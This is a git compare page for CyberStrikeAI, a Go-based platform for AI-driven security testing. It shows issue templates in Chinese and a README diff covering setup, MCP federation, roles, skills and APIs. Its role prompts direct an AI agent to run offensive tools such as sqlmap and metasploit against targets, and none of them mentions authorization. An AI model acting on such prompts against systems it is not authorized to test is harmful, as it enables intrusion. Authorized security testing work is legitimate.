Compare commits
169 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 665b1d553a | |||
| fd3a52af01 | |||
| 8368ee7712 | |||
| dd883677b8 | |||
| 2edd5ffe95 | |||
| ae588dbfe4 | |||
| 93be113a79 | |||
| d3fb14f72d | |||
| af715e23cb | |||
| 3aecdc275f | |||
| 660d95a787 | |||
| 01271fd8eb | |||
| 8c6e044f84 | |||
| cb2defd0cc | |||
| 88ab73e422 | |||
| 5404d95db7 | |||
| 32d0e98cfb | |||
| e4b1e10a42 | |||
| 870715fc8f | |||
| 772a04b715 | |||
| 2455bde7ab | |||
| dbdfc18d57 | |||
| 82daad3b56 | |||
| 9eee820096 | |||
| fae912b79c | |||
| 9b48daf795 | |||
| bfbb8b31d3 | |||
| 8b2dfea884 | |||
| 7447e82c39 | |||
| 44b8d0b427 | |||
| 3a26d77c94 | |||
| 0be6746794 | |||
| 06bfed508a | |||
| 0d617ebd66 | |||
| 9a52ec25ea | |||
| 594b7676e1 | |||
| fd5d1dff10 | |||
| b8218d9f77 | |||
| 7b7c689efd | |||
| 27b16e0d54 | |||
| 2b6b678439 | |||
| be104d1a05 | |||
| f64bda3678 | |||
| 4b8dbb1bd6 | |||
| 783d80ee37 | |||
| a27c13b734 | |||
| 3cbf398636 | |||
| 84d54b1ea9 | |||
| 91230f273e | |||
| 81fca5b2dd | |||
| 01b6b226eb | |||
| efd7a0aadd | |||
| 895061911c | |||
| a99387fd6d | |||
| 068dbc1209 | |||
| 7c35c93f23 | |||
| 79fa951da8 | |||
| 3ce9c42333 | |||
| f3b8f231dd | |||
| 6815e03842 | |||
| 42e9ad3bda | |||
| 6321df417b | |||
| 7f1ebe5c3d | |||
| bb68f341d9 | |||
| 232fd9184a | |||
| 38571c7e82 | |||
| 8347244d62 | |||
| b25f455ca6 | |||
| 49a9b57500 | |||
| 06c9bb3bd8 | |||
| d50fa3d633 | |||
| 7a1fc8313c | |||
| 7e145aecf5 | |||
| 3634bf40b4 | |||
| d317e6f13f | |||
| 18fa0ad9e7 | |||
| 15a713743f | |||
| 4926335c71 | |||
| dd6ca2d9d9 | |||
| 749cf6e37e | |||
| d80c5914df | |||
| 45f4b52353 | |||
| 704bdc7f76 | |||
| 650c56242a | |||
| af2eccc9fc | |||
| c617781e6b | |||
| 8660319b52 | |||
| 7afe355195 | |||
| 413806edbe | |||
| e6ddd9d00c | |||
| 68ad2bf67a | |||
| 67e2e56bd2 | |||
| 7d06a9575d | |||
| 09b0104403 | |||
| 66aa169a60 | |||
| 1d4c1dfb11 | |||
| 747c4a4c01 | |||
| 3d9f600e73 | |||
| 81757948eb | |||
| 98d36f750b | |||
| d598c40570 | |||
| 2064e89356 | |||
| 4a7422cbc4 | |||
| c5fc0fa2c1 | |||
| a98bfa35fd | |||
| bb05f6677f | |||
| 231ef57642 | |||
| 12eecfe5d2 | |||
| 5fa25eacb5 | |||
| 885203358c | |||
| 6fdd2c88da | |||
| 8581027bbe | |||
| 6084d2d84f | |||
| 9e7ef85510 | |||
| 89b4517a83 | |||
| ae528843ff | |||
| fc40b42d35 | |||
| 1336d6f9a6 | |||
| 5ce1fb7501 | |||
| aa9819a2c8 | |||
| 3aee7022c4 | |||
| 4ca1aa9aa8 | |||
| 3448c661b8 | |||
| b524ce68ea | |||
| 2c973f8c3b | |||
| c3a1d95a92 | |||
| 60e3795322 | |||
| 28ca7f1851 | |||
| 14e9b986b0 | |||
| dccbb80fa4 | |||
| 3043232937 | |||
| 2aeb2705e9 | |||
| 6bd558cbd4 | |||
| 71abfb2384 | |||
| d3f6a87448 | |||
| 2076266844 | |||
| 42293a9f49 | |||
| 92580bebd5 | |||
| 23fd79d50d | |||
| 5216cebb2f | |||
| e55dd0265e | |||
| d550853b56 | |||
| 87e8f07738 | |||
| 044480a427 | |||
| 88e710d7e9 | |||
| 74b2edad29 | |||
| cfc59ed895 | |||
| 9c5a115814 | |||
| a173dce667 | |||
| b5d3396159 | |||
| dcca3f014d | |||
| ca8fb8b60b | |||
| 7b9dee7268 | |||
| b90a29fdd7 | |||
| 24aa12cf33 | |||
| 7b8a220123 | |||
| 99552a1812 | |||
| e971e1eee2 | |||
| 4fb1c7b911 | |||
| 9ebf9c2252 | |||
| 7fcfbe60c5 | |||
| 0c4f934b24 | |||
| 90bafc2f1c | |||
| adfd45e11e | |||
| 63f2a6fc3a | |||
| 4fecdad152 | |||
| a32ba40353 | |||
| d48238f6a0 | |||
| 98713236b7 |
@@ -0,0 +1,78 @@
|
||||
---
|
||||
name: 🐛 Bug / 异常问题反馈
|
||||
about: 报告一个 Bug 或异常问题
|
||||
title: '[BUG] '
|
||||
labels: ['bug', '待确认']
|
||||
assignees: ''
|
||||
---
|
||||
|
||||
## 📋 问题描述
|
||||
<!-- 请清晰、简洁地描述遇到的问题 -->
|
||||
|
||||
|
||||
## 🔄 复现步骤
|
||||
<!-- 请详细描述如何复现这个问题 -->
|
||||
1.
|
||||
2.
|
||||
3.
|
||||
4.
|
||||
|
||||
## ✅ 期望行为
|
||||
<!-- 描述你期望的正确行为是什么 -->
|
||||
|
||||
|
||||
## ❌ 实际行为
|
||||
<!-- 描述实际发生了什么 -->
|
||||
|
||||
|
||||
## 📸 截图/录屏
|
||||
<!--
|
||||
⚠️ 重要:请提供完整的截图或录屏,确保包含:
|
||||
- 完整的错误信息
|
||||
- 相关的界面元素
|
||||
- 浏览器控制台错误(如有)
|
||||
- 终端输出(如有)
|
||||
|
||||
如果截图不完整,issue 可能会被关闭。
|
||||
-->
|
||||
|
||||
<!-- 请在此处拖拽或粘贴截图 -->
|
||||
|
||||
|
||||
## 📝 报错日志(脱敏后)
|
||||
<!--
|
||||
⚠️ 重要:请提供完整的、脱敏后的报错日志。
|
||||
|
||||
脱敏要求:
|
||||
- 移除所有敏感信息(API Key、密码、Token、真实IP地址、域名等)
|
||||
- 使用占位符替换,如:`sk-xxx`、`password: ***`、`192.168.x.x`、`example.com`
|
||||
- 保留完整的错误堆栈信息
|
||||
- 保留时间戳和日志级别
|
||||
|
||||
请从以下位置收集日志:
|
||||
1. MCP状态监控 页面
|
||||
2. 服务器终端输出
|
||||
3. 日志文件(如果配置了文件输出)
|
||||
4. 浏览器控制台(F12 → Console)
|
||||
-->
|
||||
|
||||
```
|
||||
请在此处粘贴脱敏后的完整报错日志
|
||||
```
|
||||
|
||||
|
||||
## ✅ 检查清单
|
||||
<!-- 提交前请确认以下项目 -->
|
||||
|
||||
- [ ] 我已阅读并理解项目的 Issue 规范
|
||||
- [ ] 我已提供完整的、脱敏后的报错日志
|
||||
- [ ] 我已提供完整的截图(如适用)
|
||||
- [ ] 我已提供详细的复现步骤
|
||||
- [ ] 我已填写所有必要的环境信息
|
||||
- [ ] 我已脱敏所有敏感信息(API Key、密码、IP 等)
|
||||
- [ ] 我已确认这不是重复的 issue
|
||||
|
||||
---
|
||||
|
||||
**注意**:如果缺少必要的日志或截图,此 issue 可能会被标记为 `需要更多信息` 或直接关闭。请确保提供完整的信息以便我们能够快速定位和解决问题。
|
||||
|
||||
@@ -0,0 +1,68 @@
|
||||
---
|
||||
name: ✨ 功能优化建议
|
||||
about: 提出新功能或优化建议
|
||||
title: '[FEATURE] '
|
||||
labels: ['enhancement', '待讨论']
|
||||
assignees: ''
|
||||
---
|
||||
|
||||
## 💡 功能描述
|
||||
<!-- 请清晰、简洁地描述你希望添加或优化的功能 -->
|
||||
|
||||
|
||||
## 🎯 使用场景
|
||||
<!-- 描述这个功能的使用场景,解决什么问题 -->
|
||||
<!-- 例如:在什么情况下会用到这个功能?它如何改善用户体验? -->
|
||||
|
||||
|
||||
## 🔄 当前行为
|
||||
<!-- 描述当前系统是如何处理相关需求的,或者为什么需要这个功能 -->
|
||||
|
||||
|
||||
## ✨ 期望行为
|
||||
<!-- 详细描述你期望的新功能或优化后的行为 -->
|
||||
|
||||
|
||||
## 📸 参考示例(如有)
|
||||
<!--
|
||||
如果有其他项目的类似功能实现,可以在此提供截图或链接作为参考
|
||||
⚠️ 请确保截图完整,包含所有相关界面元素
|
||||
-->
|
||||
|
||||
<!-- 请在此处拖拽或粘贴参考截图 -->
|
||||
|
||||
|
||||
## 🛠️ 实现建议(可选)
|
||||
<!-- 如果你有具体的实现思路或技术建议,可以在此描述 -->
|
||||
|
||||
|
||||
## 📊 优先级评估
|
||||
<!-- 请选择你认为的优先级 -->
|
||||
- [ ] 🔴 高优先级(严重影响使用体验或功能缺失)
|
||||
- [ ] 🟡 中优先级(能显著改善体验)
|
||||
- [ ] 🟢 低优先级(锦上添花的功能)
|
||||
|
||||
## 🔍 相关功能
|
||||
<!-- 这个功能是否与现有功能相关? -->
|
||||
<!-- 例如:是否与工具管理、攻击链分析、知识库等功能相关? -->
|
||||
|
||||
|
||||
## 📝 额外信息
|
||||
<!-- 任何其他有助于理解需求的信息 -->
|
||||
- 是否已有替代方案?
|
||||
- 这个功能是否会影响现有功能?
|
||||
- 是否有相关的其他 issue 或讨论?
|
||||
|
||||
## ✅ 检查清单
|
||||
<!-- 提交前请确认以下项目 -->
|
||||
|
||||
- [ ] 我已清晰描述了功能需求和使用场景
|
||||
- [ ] 我已提供完整的参考截图(如有)
|
||||
- [ ] 我已评估了功能的优先级
|
||||
- [ ] 我已确认这不是重复的 issue
|
||||
- [ ] 我已考虑了对现有功能的影响
|
||||
|
||||
---
|
||||
|
||||
**注意**:请提供尽可能详细的信息,包括使用场景、参考示例等,这将有助于我们更好地理解和实现你的需求。
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
<div align="center">
|
||||
<img src="web/static/logo.png" alt="CyberStrikeAI Logo" width="300">
|
||||
<img src="web/static/logo.png" alt="CyberStrikeAI Logo" width="200">
|
||||
</div>
|
||||
|
||||
# CyberStrikeAI
|
||||
@@ -7,24 +7,72 @@
|
||||
|
||||
[中文](README_CN.md) | [English](README.md)
|
||||
|
||||
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, and comprehensive lifecycle management capabilities. Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
|
||||
|
||||
> In security, what is truly scarce is not tools, but judgment; judgment is born from experience, and experience is often bound to individuals, difficult to inherit and difficult to reuse. CyberStrikeAI does not attempt to automate attacks, but instead focuses on a harder problem: in complex, dynamic, and uncertain environments, what should be done next, and why. It does not pursue more aggressive automation; rather, it seeks to transform the way security experts think—their decision paths and lessons learned from failure—into a system capability that is constrained, auditable, and evolvable. If experience can exist beyond individuals, then security can finally become something that can be inherited by systems.
|
||||
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, and comprehensive lifecycle management capabilities. Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
|
||||
|
||||
|
||||
## Interface & Integration Preview
|
||||
- Web console
|
||||
<img src="./img/效果.png" alt="Preview" width="560">
|
||||
- MCP stdio mode
|
||||
<img src="./img/mcp-stdio2.png" alt="Preview" width="560">
|
||||
- External MCP servers & attack-chain view
|
||||
<img src="./img/外部MCP接入.png" alt="Preview" width="560">
|
||||
<img src="./img/攻击链.png" alt="Preview" width="560">
|
||||
|
||||
<div align="center">
|
||||
|
||||
### System Dashboard Overview
|
||||
|
||||
<img src="./images/dashboard.png" alt="System Dashboard" width="100%">
|
||||
|
||||
*The dashboard provides a comprehensive overview of system runtime status, security vulnerabilities, tool usage, and knowledge base, helping users quickly understand the platform's core features and current state.*
|
||||
|
||||
### Core Features Overview
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>Web Console</strong><br/>
|
||||
<img src="./images/web-console.png" alt="Web Console" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>Attack Chain Visualization</strong><br/>
|
||||
<img src="./images/attack-chain.png" alt="Attack Chain" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>Task Management</strong><br/>
|
||||
<img src="./images/task-management.png" alt="Task Management" width="100%">
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>Vulnerability Management</strong><br/>
|
||||
<img src="./images/vulnerability-management.png" alt="Vulnerability Management" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>MCP Management</strong><br/>
|
||||
<img src="./images/mcp-management.png" alt="MCP management" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>MCP stdio Mode</strong><br/>
|
||||
<img src="./images/mcp-stdio2.png" alt="MCP stdio mode" width="100%">
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>Knowledge Base</strong><br/>
|
||||
<img src="./images/knowledge-base.png" alt="Knowledge Base" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>Skills Management</strong><br/>
|
||||
<img src="./images/skills.png" alt="Skills Management" width="100%">
|
||||
</td>
|
||||
<td width="33.33%" align="center">
|
||||
<strong>Role Management</strong><br/>
|
||||
<img src="./images/role-management.png" alt="Role Management" width="100%">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
</div>
|
||||
|
||||
## Highlights
|
||||
|
||||
- 🤖 AI decision engine with OpenAI-compatible models (GPT, Claude, DeepSeek, etc.)
|
||||
- 🔌 Native MCP implementation with HTTP/stdio transports and external MCP federation
|
||||
- 🔌 Native MCP implementation with HTTP/stdio/SSE transports and external MCP federation
|
||||
- 🧰 100+ prebuilt tool recipes + YAML-based extension system
|
||||
- 📄 Large-result pagination, compression, and searchable archives
|
||||
- 🔗 Attack-chain graph, risk scoring, and step-by-step replay
|
||||
@@ -32,6 +80,9 @@ CyberStrikeAI is an **AI-native security testing platform** built in Go. It inte
|
||||
- 📚 Knowledge base with vector search and hybrid retrieval for security expertise
|
||||
- 📁 Conversation grouping with pinning, rename, and batch management
|
||||
- 🛡️ Vulnerability management with CRUD operations, severity tracking, status workflow, and statistics
|
||||
- 📋 Batch task management: create task queues, add multiple tasks, and execute them sequentially
|
||||
- 🎭 Role-based testing: predefined security testing roles (Penetration Testing, CTF, Web App Scanning, etc.) with custom prompts and tool restrictions
|
||||
- 🎯 Skills system: 20+ predefined security testing skills (SQL injection, XSS, API security, etc.) that can be attached to roles or called on-demand by AI agents
|
||||
|
||||
## Tool Overview
|
||||
|
||||
@@ -55,35 +106,40 @@ CyberStrikeAI ships with 100+ curated tools covering the whole kill chain:
|
||||
|
||||
## Basic Usage
|
||||
|
||||
### Quick Start
|
||||
1. **Clone & install**
|
||||
```bash
|
||||
git clone https://github.com/Ed1s0nZ/CyberStrikeAI.git
|
||||
cd CyberStrikeAI-main
|
||||
go mod download
|
||||
```
|
||||
2. **Set up the Python tooling stack (required for the YAML tools directory)**
|
||||
A large portion of `tools/*.yaml` recipes wrap Python utilities (`api-fuzzer`, `http-framework-test`, `install-python-package`, etc.). Create the project-local virtual environment once and install the shared dependencies:
|
||||
```bash
|
||||
python3 -m venv venv
|
||||
source venv/bin/activate
|
||||
pip install -r requirements.txt
|
||||
```
|
||||
The helper tools automatically detect this `venv` (or any already active `$VIRTUAL_ENV`), so the default `env_name` works out of the box unless you intentionally supply another target.
|
||||
3. **Configure OpenAI-compatible access**
|
||||
Either open the in-app `Settings` panel after launch or edit `config.yaml`:
|
||||
```yaml
|
||||
openai:
|
||||
api_key: "sk-your-key"
|
||||
base_url: "https://api.openai.com/v1"
|
||||
model: "gpt-4o"
|
||||
auth:
|
||||
password: "" # empty = auto-generate & log once
|
||||
session_duration_hours: 12
|
||||
security:
|
||||
tools_dir: "tools"
|
||||
```
|
||||
4. **Install the tooling you need (optional)**
|
||||
### Quick Start (One-Command Deployment)
|
||||
|
||||
**Prerequisites:**
|
||||
- Go 1.21+ ([Install](https://go.dev/dl/))
|
||||
- Python 3.10+ ([Install](https://www.python.org/downloads/))
|
||||
|
||||
**One-Command Deployment:**
|
||||
```bash
|
||||
git clone https://github.com/Ed1s0nZ/CyberStrikeAI.git
|
||||
cd CyberStrikeAI-main
|
||||
chmod +x run.sh && ./run.sh
|
||||
```
|
||||
|
||||
The `run.sh` script will automatically:
|
||||
- ✅ Check and validate Go & Python environments
|
||||
- ✅ Create Python virtual environment
|
||||
- ✅ Install Python dependencies
|
||||
- ✅ Download Go dependencies
|
||||
- ✅ Build the project
|
||||
- ✅ Start the server
|
||||
|
||||
**First-Time Configuration:**
|
||||
1. **Configure OpenAI-compatible API** (required before first use)
|
||||
- Open http://localhost:8080 after launch
|
||||
- Go to `Settings` → Fill in your API credentials:
|
||||
```yaml
|
||||
openai:
|
||||
api_key: "sk-your-key"
|
||||
base_url: "https://api.openai.com/v1" # or https://api.deepseek.com/v1
|
||||
model: "gpt-4o" # or deepseek-chat, claude-3-opus, etc.
|
||||
```
|
||||
- Or edit `config.yaml` directly before launching
|
||||
2. **Login** - Use the auto-generated password shown in the console (or set `auth.password` in `config.yaml`)
|
||||
3. **Install security tools (optional)** - Install tools as needed:
|
||||
```bash
|
||||
# macOS
|
||||
brew install nmap sqlmap nuclei httpx gobuster feroxbuster subfinder amass
|
||||
@@ -91,22 +147,27 @@ CyberStrikeAI ships with 100+ curated tools covering the whole kill chain:
|
||||
sudo apt-get install nmap sqlmap nuclei httpx gobuster feroxbuster
|
||||
```
|
||||
AI automatically falls back to alternatives when a tool is missing.
|
||||
5. **Launch**
|
||||
```bash
|
||||
chmod +x run.sh && ./run.sh
|
||||
# or
|
||||
go run cmd/server/main.go
|
||||
# or
|
||||
go build -o cyberstrike-ai cmd/server/main.go
|
||||
```
|
||||
6. **Open the console** at http://localhost:8080, log in with the generated password, and start chatting.
|
||||
|
||||
**Alternative Launch Methods:**
|
||||
```bash
|
||||
# Direct Go run (requires manual setup)
|
||||
go run cmd/server/main.go
|
||||
|
||||
# Manual build
|
||||
go build -o cyberstrike-ai cmd/server/main.go
|
||||
./cyberstrike-ai
|
||||
```
|
||||
|
||||
**Note:** The Python virtual environment (`venv/`) is automatically created and managed by `run.sh`. Tools that require Python (like `api-fuzzer`, `http-framework-test`, etc.) will automatically use this environment.
|
||||
|
||||
### Core Workflows
|
||||
- **Conversation testing** – Natural-language prompts trigger toolchains with streaming SSE output.
|
||||
- **Role-based testing** – Select from predefined security testing roles (Penetration Testing, CTF, Web App Scanning, API Security Testing, etc.) to customize AI behavior and tool availability. Each role applies custom system prompts and can restrict available tools for focused testing scenarios.
|
||||
- **Tool monitor** – Inspect running jobs, execution logs, and large-result attachments.
|
||||
- **History & audit** – Every conversation and tool invocation is stored in SQLite with replay.
|
||||
- **Conversation groups** – Organize conversations into groups, pin important groups, rename or delete groups via context menu.
|
||||
- **Vulnerability management** – Create, update, and track vulnerabilities discovered during testing. Filter by severity (critical/high/medium/low/info), status (open/confirmed/fixed/false_positive), and conversation. View statistics and export findings.
|
||||
- **Batch task management** – Create task queues with multiple tasks, add or edit tasks before execution, and run them sequentially. Each task executes as a separate conversation, with status tracking (pending/running/completed/failed/cancelled) and full execution history.
|
||||
- **Settings** – Tweak provider keys, MCP enablement, tool toggles, and agent iteration limits.
|
||||
|
||||
### Built-in Safeguards
|
||||
@@ -117,6 +178,44 @@ CyberStrikeAI ships with 100+ curated tools covering the whole kill chain:
|
||||
|
||||
## Advanced Usage
|
||||
|
||||
### Role-Based Testing
|
||||
- **Predefined roles** – System includes 12+ predefined security testing roles (Penetration Testing, CTF, Web App Scanning, API Security Testing, Binary Analysis, Cloud Security Audit, etc.) in the `roles/` directory.
|
||||
- **Custom prompts** – Each role can define a `user_prompt` that prepends to user messages, guiding the AI to adopt specialized testing methodologies and focus areas.
|
||||
- **Tool restrictions** – Roles can specify a `tools` list to limit available tools, ensuring focused testing workflows (e.g., CTF role restricts to CTF-specific utilities).
|
||||
- **Skills integration** – Roles can attach security testing skills. Skill names are added to system prompts as hints, and AI agents can access skill content on-demand using the `read_skill` tool.
|
||||
- **Easy role creation** – Create custom roles by adding YAML files to the `roles/` directory. Each role defines `name`, `description`, `user_prompt`, `icon`, `tools`, `skills`, and `enabled` fields.
|
||||
- **Web UI integration** – Select roles from a dropdown in the chat interface. Role selection affects both AI behavior and available tool suggestions.
|
||||
|
||||
**Creating a custom role (example):**
|
||||
1. Create a YAML file in `roles/` (e.g., `roles/custom-role.yaml`):
|
||||
```yaml
|
||||
name: Custom Role
|
||||
description: Specialized testing scenario
|
||||
user_prompt: You are a specialized security tester focusing on API security...
|
||||
icon: "\U0001F4E1"
|
||||
tools:
|
||||
- api-fuzzer
|
||||
- arjun
|
||||
- graphql-scanner
|
||||
skills:
|
||||
- api-security-testing
|
||||
- sql-injection-testing
|
||||
enabled: true
|
||||
```
|
||||
2. Restart the server or reload configuration; the role appears in the role selector dropdown.
|
||||
|
||||
### Skills System
|
||||
- **Predefined skills** – System includes 20+ predefined security testing skills (SQL injection, XSS, API security, cloud security, container security, etc.) in the `skills/` directory.
|
||||
- **Skill hints in prompts** – When a role is selected, skill names attached to that role are added to the system prompt as recommendations. Skill content is not automatically injected; AI agents must use the `read_skill` tool to access skill details when needed.
|
||||
- **On-demand access** – AI agents can also access skills on-demand using built-in tools (`list_skills`, `read_skill`), allowing dynamic skill retrieval during task execution.
|
||||
- **Structured format** – Each skill is a directory containing a `SKILL.md` file with detailed testing methods, tool usage, best practices, and examples. Skills support YAML front matter for metadata.
|
||||
- **Custom skills** – Create custom skills by adding directories to the `skills/` directory. Each skill directory should contain a `SKILL.md` file with the skill content.
|
||||
|
||||
**Creating a custom skill:**
|
||||
1. Create a directory in `skills/` (e.g., `skills/my-skill/`)
|
||||
2. Create a `SKILL.md` file in that directory with the skill content
|
||||
3. Attach the skill to a role by adding it to the role's `skills` field in the role YAML file
|
||||
|
||||
### Tool Orchestration & Extensions
|
||||
- **YAML recipes** in `tools/*.yaml` describe commands, arguments, prompts, and metadata.
|
||||
- **Directory hot-reload** – pointing `security.tools_dir` to a folder is usually enough; inline definitions in `config.yaml` remain supported for quick experiments.
|
||||
@@ -138,7 +237,7 @@ CyberStrikeAI ships with 100+ curated tools covering the whole kill chain:
|
||||
### MCP Everywhere
|
||||
- **Web mode** – ships with HTTP MCP server automatically consumed by the UI.
|
||||
- **MCP stdio mode** – `go run cmd/mcp-stdio/main.go` exposes the agent to Cursor/CLI.
|
||||
- **External MCP federation** – register third-party MCP servers (HTTP or stdio) from the UI, toggle them per engagement, and monitor their health and call volume in real time.
|
||||
- **External MCP federation** – register third-party MCP servers (HTTP, stdio, or SSE) from the UI, toggle them per engagement, and monitor their health and call volume in real time.
|
||||
|
||||
#### MCP stdio quick start
|
||||
1. **Build the binary** (run from the project root):
|
||||
@@ -178,6 +277,62 @@ CyberStrikeAI ships with 100+ curated tools covering the whole kill chain:
|
||||
}
|
||||
```
|
||||
|
||||
#### External MCP federation (HTTP/stdio/SSE)
|
||||
CyberStrikeAI supports connecting to external MCP servers via three transport modes:
|
||||
- **HTTP mode** – traditional request/response over HTTP POST
|
||||
- **stdio mode** – process-based communication via standard input/output
|
||||
- **SSE mode** – Server-Sent Events for real-time streaming communication
|
||||
|
||||
To add an external MCP server:
|
||||
1. Open the Web UI and navigate to **Settings → External MCP**.
|
||||
2. Click **Add External MCP** and provide the configuration in JSON format:
|
||||
|
||||
**HTTP mode example:**
|
||||
```json
|
||||
{
|
||||
"my-http-mcp": {
|
||||
"transport": "http",
|
||||
"url": "http://127.0.0.1:8081/mcp",
|
||||
"description": "HTTP MCP server",
|
||||
"timeout": 30
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**stdio mode example:**
|
||||
```json
|
||||
{
|
||||
"my-stdio-mcp": {
|
||||
"command": "python3",
|
||||
"args": ["/path/to/mcp-server.py"],
|
||||
"description": "stdio MCP server",
|
||||
"timeout": 30
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**SSE mode example:**
|
||||
```json
|
||||
{
|
||||
"my-sse-mcp": {
|
||||
"transport": "sse",
|
||||
"url": "http://127.0.0.1:8082/sse",
|
||||
"description": "SSE MCP server",
|
||||
"timeout": 30
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
3. Click **Save** and then **Start** to connect to the server.
|
||||
4. Monitor the connection status, tool count, and health in real time.
|
||||
|
||||
**SSE mode benefits:**
|
||||
- Real-time bidirectional communication via Server-Sent Events
|
||||
- Suitable for scenarios requiring continuous data streaming
|
||||
- Lower latency for push-based notifications
|
||||
|
||||
A test SSE MCP server is available at `cmd/test-sse-mcp-server/` for validation purposes.
|
||||
|
||||
### Knowledge Base
|
||||
- **Vector search** – AI agent can automatically search the knowledge base for relevant security knowledge during conversations using the `search_knowledge_base` tool.
|
||||
- **Hybrid retrieval** – combines vector similarity search with keyword matching for better accuracy.
|
||||
@@ -217,8 +372,10 @@ CyberStrikeAI ships with 100+ curated tools covering the whole kill chain:
|
||||
|
||||
|
||||
### Automation Hooks
|
||||
- **REST APIs** – everything the UI uses (auth, conversations, tool runs, monitor, vulnerabilities) is available over JSON.
|
||||
- **REST APIs** – everything the UI uses (auth, conversations, tool runs, monitor, vulnerabilities, roles) is available over JSON.
|
||||
- **Role APIs** – manage security testing roles via `/api/roles` endpoints: `GET /api/roles` (list all roles), `GET /api/roles/:name` (get role), `POST /api/roles` (create role), `PUT /api/roles/:name` (update role), `DELETE /api/roles/:name` (delete role). Roles are stored as YAML files in the `roles/` directory and support hot-reload.
|
||||
- **Vulnerability APIs** – manage vulnerabilities via `/api/vulnerabilities` endpoints: `GET /api/vulnerabilities` (list with filters), `POST /api/vulnerabilities` (create), `GET /api/vulnerabilities/:id` (get), `PUT /api/vulnerabilities/:id` (update), `DELETE /api/vulnerabilities/:id` (delete), `GET /api/vulnerabilities/stats` (statistics).
|
||||
- **Batch Task APIs** – manage batch task queues via `/api/batch-tasks` endpoints: `POST /api/batch-tasks` (create queue), `GET /api/batch-tasks` (list queues), `GET /api/batch-tasks/:queueId` (get queue), `POST /api/batch-tasks/:queueId/start` (start execution), `POST /api/batch-tasks/:queueId/cancel` (cancel), `DELETE /api/batch-tasks/:queueId` (delete), `POST /api/batch-tasks/:queueId/tasks` (add task), `PUT /api/batch-tasks/:queueId/tasks/:taskId` (update task), `DELETE /api/batch-tasks/:queueId/tasks/:taskId` (delete task). Tasks execute sequentially, each creating a separate conversation with full status tracking.
|
||||
- **Task control** – pause/resume/stop long scans, re-run steps with new params, or stream transcripts.
|
||||
- **Audit & security** – rotate passwords via `/api/auth/change-password`, enforce short-lived sessions, and restrict MCP ports at the network layer when exposing the service.
|
||||
|
||||
@@ -259,6 +416,8 @@ knowledge:
|
||||
top_k: 5 # Number of top results to return
|
||||
similarity_threshold: 0.7 # Minimum similarity score (0-1)
|
||||
hybrid_weight: 0.7 # Weight for vector search (1.0 = pure vector, 0.0 = pure keyword)
|
||||
roles_dir: "roles" # Role configuration directory (relative to config file)
|
||||
skills_dir: "skills" # Skills directory (relative to config file)
|
||||
```
|
||||
|
||||
### Tool Definition Example (`tools/nmap.yaml`)
|
||||
@@ -281,6 +440,26 @@ parameters:
|
||||
description: "Range, e.g. 1-1000"
|
||||
```
|
||||
|
||||
### Role Definition Example (`roles/penetration-testing.yaml`)
|
||||
|
||||
```yaml
|
||||
name: Penetration Testing
|
||||
description: Professional penetration testing expert for comprehensive security testing
|
||||
user_prompt: You are a professional cybersecurity penetration testing expert. Please use professional penetration testing methods and tools to conduct comprehensive security testing on targets, including but not limited to SQL injection, XSS, CSRF, file inclusion, command execution and other common vulnerabilities.
|
||||
icon: "\U0001F3AF"
|
||||
tools:
|
||||
- nmap
|
||||
- sqlmap
|
||||
- nuclei
|
||||
- burpsuite
|
||||
- metasploit
|
||||
- httpx
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
enabled: true
|
||||
```
|
||||
|
||||
## Project Layout
|
||||
|
||||
```
|
||||
@@ -289,7 +468,9 @@ CyberStrikeAI/
|
||||
├── internal/ # Agent, MCP core, handlers, security executor
|
||||
├── web/ # Static SPA + templates
|
||||
├── tools/ # YAML tool recipes (100+ examples provided)
|
||||
├── img/ # Docs screenshots & diagrams
|
||||
├── roles/ # Role configurations (12+ predefined security testing roles)
|
||||
├── skills/ # Skills directory (20+ predefined security testing skills)
|
||||
├── images/ # Docs screenshots & diagrams
|
||||
├── config.yaml # Runtime configuration
|
||||
├── run.sh # Convenience launcher
|
||||
└── README*.md
|
||||
@@ -314,36 +495,39 @@ Compress the 5 MB nuclei report, summarize critical CVEs, and attach the artifac
|
||||
Build an attack chain for the latest engagement and export the node list with severity >= high.
|
||||
```
|
||||
|
||||
## Changelog (Recent)
|
||||
## Changelog
|
||||
|
||||
### Recent Highlights
|
||||
|
||||
- **2026-01-27** – OpenAPI documentation with interactive testing interface, supporting conversation management, message interaction, and result querying
|
||||
- **2026-01-15** – Skills system with 20+ predefined security testing skills
|
||||
- **2026-01-11** – Role-based testing with predefined security testing roles
|
||||
- **2026-01-08** – SSE transport mode support for external MCP servers
|
||||
- **2026-01-01** – Batch task management with queue-based execution
|
||||
- **2025-12-25** – Vulnerability management and conversation grouping features
|
||||
- **2025-12-20** – Knowledge base with vector search and hybrid retrieval
|
||||
|
||||
|
||||
